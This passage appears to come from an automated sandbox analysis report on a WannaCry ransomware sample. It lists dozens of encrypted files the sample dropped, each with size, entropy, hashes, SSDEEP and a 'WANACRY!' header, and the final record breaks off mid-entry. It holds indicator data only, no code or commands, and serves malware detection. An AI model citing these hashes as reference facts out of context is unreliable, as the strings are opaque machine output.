                                MD5:E00C37C800AE82394A726806CB313CF9
                                SHA1:F689FF82A909F823A348C790AAEABC88A16A3605
                                SHA-256:BD0861F21DA8E71E0AE954F17067EF03FE7ADB84D9250A4B7FCD0DB3268B6937
                                SHA-512:D2BCEFDE2239582BDF3E67A2725E625305617D4F2C075919B6183A9A330350D6057C0AF9ED5CC9BF645B2F632F7BE3E832B4013E1DCB2F83AEADEB96F5193AAB
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):45800
                                Entropy (8bit):7.995902480623642
                                Encrypted:true
                                SSDEEP:768:rPLoNaRuP8pP1ePtpAEb5XVrIdZhcOUUQq71Dzgy36JusJ69gU2u9Wzm:rcNxKw0EdI7UvMWe6JZJ6WJu9Wy
                                MD5:D901C9AC2E794C4C59414FCFC2F6CF28
                                SHA1:88959F2966CC3C638D346F748B5BDC84BB8DA0B7
                                SHA-256:B31275BF3E09105102C389106055305D6A33C050AFBF2178ED698C2DBA4D8253
                                SHA-512:3009EAEAF3F3D2CC8EE5F717BBEAB3EC210A11F505916E2B96E82DF8D78E800AA916BE4A41D944A48CD89680ED268867EACC1FB38701C78855EC59408DBA001F
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):202536
                                Entropy (8bit):7.999033851806259
                                Encrypted:true
                                SSDEEP:6144:i/liHcaxCcz2GEl9YcU3wHHJAcNYI5lmSIA4:20cmC0c3npA2xzq
                                MD5:C43E894352B8B8BF96E384B64D3E3C10
                                SHA1:8CC3470DDF9DA8911D96C4DA6A154D5047E0406A
                                SHA-256:99C42BFC8C2A05A41417191376B2A3A2116B98C9887EF23BCBCF3011CB9A0308
                                SHA-512:89F6EACC9E92B7AC2FC226B36633DC222CBE3ABAA883E5F447E8581D7C9A7CF10983D85DA862B4505DD2BDAD4830CE37C905F18A57EBA6241DAA4CE758C962B8
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16200
                                Entropy (8bit):7.98716465787195
                                Encrypted:false
                                SSDEEP:384:lhmyBMd34sPfz3FY8XiYErHBBTJ0zhBj6VxIKAbQK:lFBMdosPzFBXrI1yXj6zIKs1
                                MD5:FF73082314F9E6DCD7751FD87B4B042F
                                SHA1:830D54B7F745A6659019A500C9398F4724B9198E
                                SHA-256:8CF438E0B7B73D4062BA2320DF33F529ABCCA4BC545F203878E1751FFEF00FFF
                                SHA-512:A367279D1B81BBDE6CDF0868AF860CF526FBFC933634E36815CFE83871A2E77968A12E2953BFA9C232C8B732B7A7A32BC4967C27CCFFDE435E982E2C3B0E85C7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):49160
                                Entropy (8bit):7.995621412312451
                                Encrypted:true
                                SSDEEP:768:enBd+w8gAVri36ckB2KFMtvW5fzBh8pKy8o8vrEMupBgS8/4QcGgrUbHxElZHVC0:ebJPAO6v/a1WJdhGDK4ryBcdWGzcpy
                                MD5:56B635FDADD32E72CE2E08AA60FF3AF4
                                SHA1:390A19B78ED2738E2AC4725C111590A6DA0A2B9C
                                SHA-256:16121E77CEEB1B0C4C16E559CC6D284047577E35F91FC6E073036C143C379D49
                                SHA-512:92B5FFE56012C400F085E95EA68CE33F2F45FEC181C0E9E8C338D4C426DCD60BEB2AEDBA933B47A3E458A2EC77EF87A546E20C6019E51F934EB6522F8DAEC301
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):40328
                                Entropy (8bit):7.994770624576006
                                Encrypted:true
                                SSDEEP:768:zNm4oTk9t+VBuSb6bkocH0QsfrBhzv5K90k2kxI7Rh:5ETk9t+V90QsfrS2D7Rh
                                MD5:86AF0EFA74A74C71BD847B8E98E9DF3E
                                SHA1:32AEB9F7F0194E202640EDA7B4CD0F5054FB2038
                                SHA-256:B619038072C0109DB085BD43681AD701371086D1AFE5152DC1F357F17C913632
                                SHA-512:1935D570153AA003987A982FBB00EECAB96C0AC8BC033872FE3C20C39FE5D8F985B64970AA319D49E83EB339132F2A362C50241FB2BEC021268E555949A4689F
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):799560
                                Entropy (8bit):7.999788883461205
                                Encrypted:true
                                SSDEEP:24576:t8H7Mh0HdftRyCNmTe9oYsaAiyqBXiHP/in886:tPiHdf3yCNZ4iZBXiv/in886
                                MD5:857E37794294AD27DD71FE7FAD518708
                                SHA1:D0F5129A5D677317D4C06742C3DC91DA0244B6E2
                                SHA-256:D5638464EC02F8CCA459FFDB7B32573503DEA91F21CBED28E2E2D675305D3C80
                                SHA-512:3E2BC37A6F6D6EC629DD9F8C6E3AE0B9C67A68017DB963AC9199584A7E9B0A632E94D019EE4EFA8AEC4B3B9E94DB82B403FF7B08B3615078BBB583987A2F5C99
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):89144
                                Entropy (8bit):7.998195851740088
                                Encrypted:true
                                SSDEEP:1536:rHsy5UKBGQ9KVnYXR4dJMeDIi9PeX9Dxpf3Fqg0T+/QfR+cVYXvtTJn:rlUKBGQ9KVnYXR4zM1iA9gg0NRNVYfzn
                                MD5:28C1F1C542F40B128268CD67F83A1649
                                SHA1:AD1D412AE5590C242603B6EF331B897E87FEBB4C
                                SHA-256:AEF1DB307348C0DCE0A7F668CF76349A447504FAE0477F14F2793AAF788D4E4E
                                SHA-512:1FDDA9773BC7B0E61506221B8153E63FE50D537B85FA2CA349E48F1F6E4AF6DAF1CD8CE748574261986E03F32E6B124FDA2AA5A187E980703C82E6F6434F5513
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):186072
                                Entropy (8bit):7.99898605840687
                                Encrypted:true
                                SSDEEP:3072:43plQiwYlg5czwfxot7VywUKStM+Q++OxeoWnI24qLdj4VnDcqk0NbfsnTKVUhI:4LIYG5WwfO5+PxelIedjODcqk0Nbfsn0
                                MD5:2B5101D3A4C9640231CCC0338F202DDA
                                SHA1:245FDB1D00D674074706ABF05AF57AFF516A056B
                                SHA-256:DCAA3DCE6B5458301F096EE2A380DCCE19E501B6759950EFC95EF9606F766BF5
                                SHA-512:79A9F274A3986D7EA2CDF0B0990970147AE9A346961E519A8332CA19FEB98B8BC7ED502CFC45BDC43FF047678D4ADC0E3D063AD27FEF05295A84D14BB22C6CDF
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):17736
                                Entropy (8bit):7.988540576660658
                                Encrypted:false
                                SSDEEP:384:glmskKnYWeQGDYKqDio5m0RlHMCzwSzVx9y6a2CojO:gekkpjqD/mypzzx9y3Y6
                                MD5:345E6A36EA4025A3082906F7F9AB8FC3
                                SHA1:E510FD4488D5EF2F24E21AEDCE7296B51E84F7A3
                                SHA-256:D99E2AF89B0AE22D623EDB8F4222680C4C4BA269CF8F8BD49A5E9CAF6D8103AF
                                SHA-512:17922FC8325D2BCE0183B592E83D79994FC3398B294AEEB887351A82F08F928FD850E22B193D916E595C239396523F02AE45A768C8FF8CD8C59C365682FA2DEE
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):73912
                                Entropy (8bit):7.997339375274032
                                Encrypted:true
                                SSDEEP:1536:M4m9jKp+mL2To5/4ZFOVwsVL85eQ9hANFddPl8:dSjzmOo5/4bYwsWc4hALP+
                                MD5:002F9474F6B144D511043CABF1EFB29B
                                SHA1:4037FB94EFF17EC26C4C956A152F57CE332EAA28
                                SHA-256:8457F673460CB4965856E531BEB643E603D2B7D2DF095CD59CCFFA3D29E7C698
                                SHA-512:042509C7434A8B003D78532164202D8A34B86E49E4B7E713E59CD76EECC32CA21110841DABE94135362BE7B6FFB6B7F03810658401A54D28E7387FD538FB7E0A
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):19336
                                Entropy (8bit):7.989886519735407
                                Encrypted:false
                                SSDEEP:384:ht7hUBeyWBTPMWC3otDzkVjo9JogsgILrnq0jT1A1PNOI8SQMDK:hdmBQJzCizkVjo0iUrq0jTi1P58QG
                                MD5:3639642B7094483ABCB4DBCA2BEDDAD1
                                SHA1:9B85592C282A291358E3A0C6CB99B5177B7A2F9A
                                SHA-256:FFB228408E056F76C40229F00C07CC0FD4DC4DA1F0AEACA2EDC4F21058494DA5
                                SHA-512:F9E62BB4235A7D341A5AB8A097A0D5EA0D869BE700D14598012AB1F4BD4897BC72F9C518F424D4FD03C5C1D4841A1062F7967B9CD1544CDC56E7ACBB18C58B5D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):20680
                                Entropy (8bit):7.991114500397896
                                Encrypted:true
                                SSDEEP:384:6fF373w5y7p4sq7x0LqOVtFN8BQc6kB9fiJO5+xyX1J95utPa:6fB72y7p4sI4DrrkB9QO57X0a
                                MD5:271076DC28DC047D275E9623D49FA40E
                                SHA1:364F0250867D605D2E180ED7A07FC5BA2161F80D
                                SHA-256:12A1E23BCF821BEF4F37A3E8C4A78604EC3AE8F38C1BE31F574E114413406AF7
                                SHA-512:AEB9DAFEE92D3DBD875613AD1A56EBA9669453A9D6AC375508B04250C97FC2C148EEC8CBF117CFB78EAA10B9A00F1C036606F45A5DBAC653AC2DEE70EC6206F3
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1608
                                Entropy (8bit):7.870503596825595
                                Encrypted:false
                                SSDEEP:48:bkwaL9rLGB/xzbtv6/LoLYpehSjgAkCaIFl7zJvIYabSmn:owaJmzs8Epey1auXJv9On
                                MD5:91BAFB1B719F870F604AE8E7E0A00222
                                SHA1:6D0F152CEBB7D740872258A6EC63A62C7B6ABABE
                                SHA-256:A7BF26DB8A17EA844D5FB0E2D024559A8185C738E85E9A65189BF0E08C1A0DB4
                                SHA-512:151E850AA29A5EAC4C711B44D2115D1C838C70331E4D22798480C9B5963CE3539258D927A6290D814AD617F43A9999A349698776C90B3624A3EA28F737F654D1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):37464
                                Entropy (8bit):7.994587542982609
                                Encrypted:true
                                SSDEEP:768:b9B4StTbu7V9gFVyMpEHcbz03L+Yo9Te+EVCwXY:bcmTy8FVyCE8bz03L+YN+ACwXY
                                MD5:F4938103BC30BE9C3766B94F337723CE
                                SHA1:CB447A8F7F87E305D5CB855A4605CDF2C24D0D27
                                SHA-256:C8DC3BEE97AC9A3D5E2DF9E4C7A59948A1529FBC5C7CE0DCE6C079108387ECC8
                                SHA-512:03E4948B77091860E7FC7BC4B7E85E535F8B6AE0DBA82F078135DA689ED16ABC2C5E13E212532A319BE8DA0DBD577CE39F8AD0D2432D2A5951D699DA3E1E4031
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):168968
                                Entropy (8bit):7.9989785551961194
                                Encrypted:true
                                SSDEEP:3072:Jw9UXCTr630xiXDKF9v1fK6Bf7yN9deBaNncN5N81q/vp7b/9PMqR:JoUXyr6kAkdpK6dyN9kgcNX8E3Jr9PMM
                                MD5:6E943240ABD34AC785765EF07802D85C
                                SHA1:532ACAAF3872E4169ECC95BA71F51353AE4A0BE0
                                SHA-256:A2B574165772A03EA57770ADD0438C5A07A86C7036918F4CA1397B2F4A2A598A
                                SHA-512:2A706FA33409BDABC8814CC051C67F4AEC2AC12FBDA4A21F27D44F7D7CC6E149C3ABA40C2EBC431E3E0128A8C3615719AF6746510CE6C3885912592945A3F587
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):51224
                                Entropy (8bit):7.995672375915484
                                Encrypted:true
                                SSDEEP:1536:6v6OvH1VI/ubGMUBrP9x3N6jnwFsUxkY+q3:6SY1XK9BN6cFfx/r3
                                MD5:2B37747A713EFD334C93B3D16CEF456F
                                SHA1:7FA577A621C93F5A70023B7FA235E2402243DEB9
                                SHA-256:A92BDFF33DEB04071B4D1E0FD7DB647C85B2F1B7CF08C31BD6AD2E8E6EC8A268
                                SHA-512:032560553D88C47FA58BABD61F2CE66C4D5FD241F93295DC2B7902D25A24EB8AAB61526A837DCA86B445279B936EE4B25ABFD9ABAF8D003504EF228D846B90E1
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):69016
                                Entropy (8bit):7.997042868526277
                                Encrypted:true
                                SSDEEP:1536:w59iwmDiTVpqmj/ZGOh1IDKwu5jxBdqH8VWIy6sY9:m9dmDwZb4OLIDvu5VBdqiWIyq
                                MD5:F411D6F1D8E15E8EC6ED3D4C760F76B8
                                SHA1:FFFE32DB8F0DA72AB8F06D0BFA6FFBF6249A63C1
                                SHA-256:43A44A5D0CC47E32F56AE156FAAE2678EC7666E0B42ED4BB8EB778440EFC89CD
                                SHA-512:AB4A7DC7B36FD6278033C6FE9886CFBF81521BE66EA936FBEB23193258E02FBDF73CEFA15FED56B6FCF40A81FA94608954874C59958B1E52955F92DC3F5FFE1E
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1573144
                                Entropy (8bit):7.999893329010336
                                Encrypted:true
                                SSDEEP:49152:HabvSk4MyCdEL0qQgeuQI6BOQ72KbIW6hM1M:HabKRkdEoqQgrQ9kQ7V0W6hJ
                                MD5:6E5C201614FF5C332DD7C7F9099BAC8F
                                SHA1:DCF9A36532C4245320DC034E2CE88B56BFCFB06A
                                SHA-256:675B5E7FC0A3304C9A71AD92FA480AE4AA51AEB780C497FB6DF16B5945FC1C0A
                                SHA-512:DCE0019C408655A786EA372087495BCE906A96D2997CBB0B82E6B9A97AF0ABD6287623BB883BAA2EEE50E4F20EFDF9FCB6BB222F212B95AE1984FBF14AA09953
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2097432
                                Entropy (8bit):7.999927097928958
                                Encrypted:true
                                SSDEEP:49152:9xisFctDTkzmdL9cZTQra8GQNqb+tvJ6HKvg/AtW/O2X/YkRQ9L:9AsOtnWsrYQNqkJ7DW/Z/BQ9L
                                MD5:DAD0BFEC204D84A28AB297E5BC2D4E6F
                                SHA1:96EC04EF881030A7338E1934C2A99DCB4B5AAFB2
                                SHA-256:D119D9A96A12E05D80D73E8EE4F96AE0AA73044255B1D71FEEC3E213434DDB89
                                SHA-512:DF536861910705DBB92098F9280F70F8900A358151553802537EE4A26ACE132A19217D4D94378498BFA0649B84BCE92DF445FD8D7A417D563FF070F0F5441C51
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38040
                                Entropy (8bit):7.994693055365256
                                Encrypted:true
                                SSDEEP:768:5MYM0FsCwu3MrGnPewdyKkySfqYM6LS7PaPbYUlbg2To:5PsCjmePbzS3M6LNA
                                MD5:662F34EBB1DDBE5FEBE8410ED9F73662
                                SHA1:70D2480FA291560DD6E8D2A7F01B68531017D7CF
                                SHA-256:D82FAB63D24811DDE7D2B419BD25037EB8380790EB6BC1313C2A408E1CA0068B
                                SHA-512:25EE210C7191167714751B8F00607D1FCADF90BA3EF3E66B3BA43CCCD35A7ECFB40F2B52C8AC04C7D1DE32DC93C57EC481EC9E9E2489038D6911BCF7899C6717
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.136588519832637
                                Encrypted:false
                                SSDEEP:6:bkETgLmDhBdSyUHihPXFPcnq0u69dRmxWqTDqAlII:bkEULKhnStHiZyndu+Kx5TTCI
                                MD5:1D86A4E9D94DD4307B57F9910A9E65EB
                                SHA1:13A607B0D358929CB7A18C509E7F77D9EA74CCFE
                                SHA-256:1BF26B9E0BFFD5616B750A271D418DD980D36D445BFED3DA39BF24D47AD36957
                                SHA-512:68D0B28D568B939B6BE6CD1FB921A0E288B4DA5588073C95AFF736D1051A77C1943892BD92F6FF745AEAA294A5E15023FED6E1659FEDCDD744017BE607307666
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.248141053645653
                                Encrypted:false
                                SSDEEP:6:bkEV2jD4+bpm9rZ26+YrhPz9MmUM2eVBnG/gWmWtGPb7yMl2GE:bkET+GrZxnrhPz9MjFWBG/JmWtGj7vq
                                MD5:C49062ADDE495F8CD047EE37E215BD93
                                SHA1:6FC4492E7802E621F95671C9D5AEAAD490F23345
                                SHA-256:DF4CFA3E090CFCDAE195B4750BD2951F4220D9E04EC08CC17CA9E08E36DF4213
                                SHA-512:75BC5B56F61880DEE072D6DDD612B8429BF2828734FC19184E4E16F9BED12A41447DDCF01B3D4B889751B0DB8A281653D1148D421D6430545FF6BF3EA0187E26
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38040
                                Entropy (8bit):7.995224439986361
                                Encrypted:true
                                SSDEEP:768:gevdwsOioGwWkopt71XQi+Hvk/iGk/fR3abt5a6dls1Ebz1EdWvT:gevdfOi9hksgk/VkHQh5a6dBbn
                                MD5:5D46E574464E9B8E1D39BC18B1006AAA
                                SHA1:E46F8A929325FDC049431FE10DD9BAA13B3ADE24
                                SHA-256:047C59015559514967CA1A8F49129E760CA13E4AEA18F5365379B171E4FFEA5F
                                SHA-512:AA7D20DB7C2364305B4B7F82FC0923E868AAB1B349772B6562FDC810B4D8B588D83CD4428E4C22FA1171FDDC9AB2D3EF6D8C198B4CB69D68DE050EF534690922
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.11558580840823
                                Encrypted:false
                                SSDEEP:6:bkE/OZ89U4kRUjgQ9SUlEdWJLn158meVh5GHEtgz0qgIL4PuK/ORdD:bkEHb/EU5V1yz5OpOPxWRB
                                MD5:07CCCA98D78D46058DA9DEF13B05FB48
                                SHA1:46C5D3E00EC33854BF94E450542EBB7AF8AAA789
                                SHA-256:9ED005F2EDC45F37E8454A4DA176076EF6D7B4816100B25C6C1E20A9C06469CA
                                SHA-512:22367A13A305575F270083855A6CC100BD58605437515F317AE79C130C2443D00ACD8A682BD08CBBF6F5D313726109778B81E3A4A2150742653E9ED460C5F038
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.1552026245769875
                                Encrypted:false
                                SSDEEP:6:bkEpT2FxPXFM+ZOQgzN2UC2zS6jpSSEadVxlqxCIaIwNS:bkEUbPXFUQENzbJjpSSEavxlrM
                                MD5:DF95D77FFA72CC9A9520D9AC94FB5A76
                                SHA1:5A1551C5003BE899CBD58F963C798AA86034DEF7
                                SHA-256:4B1C6B47EBB89F9A2EDDC32420426832DC29DED1837D3123972309B67F07DC94
                                SHA-512:65D4ABFC89A9F62F01F4C31ED1AB9FDCE093876E0DEE513D08720B3457040568CEDED919818BC7B1811AAD95F7B7038CE41B4736D5E02F2F7E527F862479441E
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38040
                                Entropy (8bit):7.995452270200452
                                Encrypted:true
                                SSDEEP:768:Gb0/TpumAlDTnLVyqouJY5/qN1Uxk3H5NzLzKtmtGg/z2/u:28dlCneH5/qQxAFL22K/u
                                MD5:286D154FEA55B0B5DCCF7ED31941AF51
                                SHA1:9D5F547EE531B193EE0DADBEDEE7C4D85436EAF7
                                SHA-256:C6F2D298E0D78974039DB775D076AB09EBEE7EC530EC76BFC10AD23BC788B7C6
                                SHA-512:731E20C4E24C0537AEF51EA55F1DC08A51CCA643CE1A8B607B436876789332A305D231093FF54B975E3613DF1EDC61E8B89D18EF55CD70E6B1F8C6C6885B6C75
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.162940780169734
                                Encrypted:false
                                SSDEEP:6:bkEJ/5AdkG91T9IcM5akG95dcCCWI4xSrPYJOIEjVgixnMgybgrC+Pz/gCfde:bkEN+dN91TqRe95dcCc4xSrPsujNNyki
                                MD5:88D18F8596B524AD01D0FCDC4C4EF862
                                SHA1:B9D7AAABF400CB099B462E0B580BFDEF2FC93323
                                SHA-256:19388E7CD21537A054A3E193F9562512CC4E17890E9A7B1601F9F1E56F2346C9
                                SHA-512:412F40E8BA47DF1E7A09F44751B9B350A40B201C9524761AFB52EE25462DE5B05D58B8480BA5F024743885B2A01617D9F088FC3D67064C2B23EB8AB3D990154B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.1784478425541325
                                Encrypted:false
                                SSDEEP:6:bkEnpF6dtpcAcFLMvwf4WD7H5zUF3R0uWXG/Ayg4/fw:bkEyncAqNX7HGFalqtgj
                                MD5:19861233D8B8741A30EF3AF1FFD16D19
                                SHA1:31D2754B3BAC10D91CC8EDA27E036F0AAFBF9C88
                                SHA-256:207947484A1EACC50A2C6D516C27C44F6A2496B0E7A5B7953C0DC588C96D7099
                                SHA-512:801736CD55EDDEE063BFC1456D01CE584A925688D7F5364C8E21D699E29C000BEEA2BDDEB6E9D4CB32B1008F51335020B9D1DD0EB1EB059C8F4772CD85DCB5C6
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38040
                                Entropy (8bit):7.995283190461034
                                Encrypted:true
                                SSDEEP:768:weKVzjpD5WTEqTlNVilU+vhYfyMpDmO+8s0FEsjiibSB4L/psMJ9u:wZVz1D5EEqRNWvhYfBpqO+8soSJM7u
                                MD5:A876257E7834F3EAF7C38E30214D409B
                                SHA1:701965B61A9B43678C5A568270637CD73371BEF2
                                SHA-256:4C5F743EA3917D33739D9FA22C3364310473BAC0994237556D776D356D2CC8F9
                                SHA-512:07744EB1E1559629A690C9F3E5E6BAA83EB6BC160BEDE439437E0A2278836CD9FDCA7C8EA8158B17E57C4B09254695F280E0BF15317175E6B1E20E97D075EADD
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.130603683714442
                                Encrypted:false
                                SSDEEP:6:bkEvkUqSf1dee/uwVXXgoApjH3pr3/Y+nMRh9gfmJO/I/xR:bkE8Uq4dee/uqQoApjHi+nMRrvf/7
                                MD5:2F4EAB7657C3BAE35A5ACBCADF6DE7AD
                                SHA1:64EE3F2014D965BFCD2D1334039720755928D350
                                SHA-256:5A159B82BE706BB70045468DC74FC59E99C05AE3A7D8195443352E0D427F7B08
                                SHA-512:4C84405D2E3070AF7DFC78F05B7C463DBE33BB798F0855D1C9A6EF1782E3174F4A6101F15F6DCF6529A35B02F6B9B53A1E63E8F3C924EA475AAEFDBEB7906F78
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.152389365805461
                                Encrypted:false
                                SSDEEP:6:bkESb8Bu/ezwlJhXOQUau6wjdZ5SN1U06XghchSl/E2K3x:bkEOSuHJhtqbsfGYchWjQ
                                MD5:45DF573EE1C5CA5E3829AABA3D6CE673
                                SHA1:A26A8BE3E6581F3F0BA30F0D0B8EC7AD387EAA5F
                                SHA-256:9423A4A4A213B66A2F9C6C355EDFB27BCD6E4389795EB3C8AC75455EF66A10D5
                                SHA-512:6E7283EB96F7C1B510825859566E3583CFEF3ACD0C978E306CCE5D07C38EDFAB38DB8CBCD634B93E6D1C1F3C9E3D106127573CC021020824788BA8D41EB7FA04
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1426184
                                Entropy (8bit):7.99985256158353
                                Encrypted:true
                                SSDEEP:24576:lYUm6gESFXPxnNydZgREymbTtJr4j/tTg8+WC2T0jOuG40Fmz5ze/bOzSU95:lYUm6VuPxN8mREDDr4j//TdwjlL4mNUO
                                MD5:813F957D188BB9AEDB7B137D1644EEE8
                                SHA1:03645D02A41D20A35556D3314BF1034D0CF99751
                                SHA-256:A8B0ECB27F2D496729C53F31E73A68BBFF1900AD1927D593DC05CF9238B215B0
                                SHA-512:7C122B2FDEC7CC03F75D39D3ACA5766A04552C60B690888A21F1216644F80010ABBDA063DCC11112C29EB25CB33F2F4CD05D8BA682E1BB42BCE596EABB077CA8
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):352008
                                Entropy (8bit):7.9993808630216225
                                Encrypted:true
                                SSDEEP:6144:TTy9MfdlQJiF25R3Tp1Ag0UYce7YPGjimfCYdXmJwE1SSlB2rkCKKtoDCy:TT8MFkiF25nAU3gsuZj211PlcrwAO
                                MD5:815F95E5EB3F533A70FEA15F2BCC6B48
                                SHA1:5D46518F396A4018476C6A943F526A1E2D42EEC9
                                SHA-256:693C29D7877F7EC4B1229127260465FB738A1CF6427EE96F12B49776575F7136
                                SHA-512:E854D870C2CCFD0F9099E3621E109FD37D6A95009E96D87292584C1ED6BC0B97143399B19B420884CDD0B0E9A931D65FEEE027D72A6B0CBC7569EA1FCC1A5C67
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):243784
                                Entropy (8bit):7.999194677387297
                                Encrypted:true
                                SSDEEP:3072:aB0Hj5JoSXjYVWhQvC83CTwIL987q6pxL6IPV8Oyiz23yzKKv56upVzH2On0MAJI:FOXv0TwIpMq6nh/lh6QzLn0zJt0Q3m
                                MD5:ABA0733B2B79EE8B601A002350CD3988
                                SHA1:AB8C899ABF1EF874571FBB519845B4BF880FC05F
                                SHA-256:F2360EA81155A7680F460278D1FDF21E7E5F44503B6AD45BFEA2A28B14687259
                                SHA-512:6007CE8A7A8B5ACFC8A5C2A5BF84340F03CF6F07DE555832347ECEF341A6A3BCABE33CBA1B6237E6999ABAA6DF28E8A1C9691DB9A90A4EE9DDFC7AB9824BE7C5
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):533032
                                Entropy (8bit):7.999659495897816
                                Encrypted:true
                                SSDEEP:12288:2yJwTAbdc+r0ZHgqe4zLVbaV3L0/nOLhNl3GRznk4:2yi+UgqtzLVeL0/O1Nka4
                                MD5:591B90F98D96219113149C2EFAB64AD6
                                SHA1:F774CE49278C2B1C1FE9CF02EECA8E7BDF0B071A
                                SHA-256:B5742BEA35E49904E26332B99DCCBC6D343A6723EE330DB8DCCB2757C2DCC44C
